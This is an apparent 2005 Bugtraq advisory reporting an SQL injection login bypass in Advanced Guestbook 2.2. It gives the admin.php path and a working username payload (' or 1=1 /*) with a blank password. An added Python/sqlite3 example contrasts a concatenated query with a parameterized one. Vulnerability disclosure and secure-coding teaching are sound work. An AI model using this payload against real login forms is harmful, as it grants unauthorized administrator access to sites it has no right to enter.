Advanced Guestbook 2.2 ( SQL Injection Exploit )

bhs_team_at_yahoo.com
Date: 11/06/05

    Date: 6 Nov 2005 19:03:12 -0000
    To: bugtraq@securityfocus.com
    
    
    Guestbook 2.2 web application (PHP, MySQL) appears vulnerable to SQL injection granting the attacker administrator access.

    Target :

    http://www.example.com/[GuestbookTarget]/admin.php

    Username: ' or 1=1 /*
    Password: (Nothing)(Blank)

    It's working on Advanced Guestbook 2.2; version 2.3.1 will fix this vulnerability.

    Report By : POPO ( Pooya )
    From www.Babol-Hackers.com
    bhs_team@yahoo.com
    Y! ID : bhs_team , pooya_0nline
    -----------------------------------
    BHS-Team

    We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
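
Added example, not part of the original post and not Advanced Guestbook's own code: a small Python/sqlite3 model of why the reported username passes a login query built by string concatenation, next to the parameterized form that rejects it. The table, column and function names and the query shape are assumptions (the advisory does not show the application's query), and SQLite stands in for MySQL.

```python
import hashlib
import sqlite3


def hash_pw(password):
    # Unsalted SHA-256 only keeps the demo short; it is not a recommended
    # password hash and not necessarily what the application stores.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed schema and account; names are assumptions, not the app's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE auth (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO auth (username, password) VALUES (?, ?)",
               ("admin", hash_pw("constructed-demo-password")))
    return db


def login_concatenated(db, username, password):
    # "Before" pattern: form input is pasted into the SQL text, so a quote in
    # the username ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM auth WHERE username = '" + username +
           "' AND password = '" + hash_pw(password) + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened pattern: values are bound as data and never parsed as SQL.
    sql = "SELECT id FROM auth WHERE username = ? AND password = ?"
    return db.execute(sql, (username, hash_pw(password))).fetchone() is not None


REPORTED_USERNAME = "' or 1=1 /*"  # string quoted in the advisory

if __name__ == "__main__":
    db = make_db()
    for check in (login_concatenated, login_parameterized):
        print(check.__name__,
              "reported input ->", check(db, REPORTED_USERNAME, ""),
              "| valid login ->", check(db, "admin", "constructed-demo-password"))
```

In the concatenated query the open comment removes the password condition and `or 1=1` makes the remaining clause true for every row; with bound parameters the same string is only compared against the username column.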

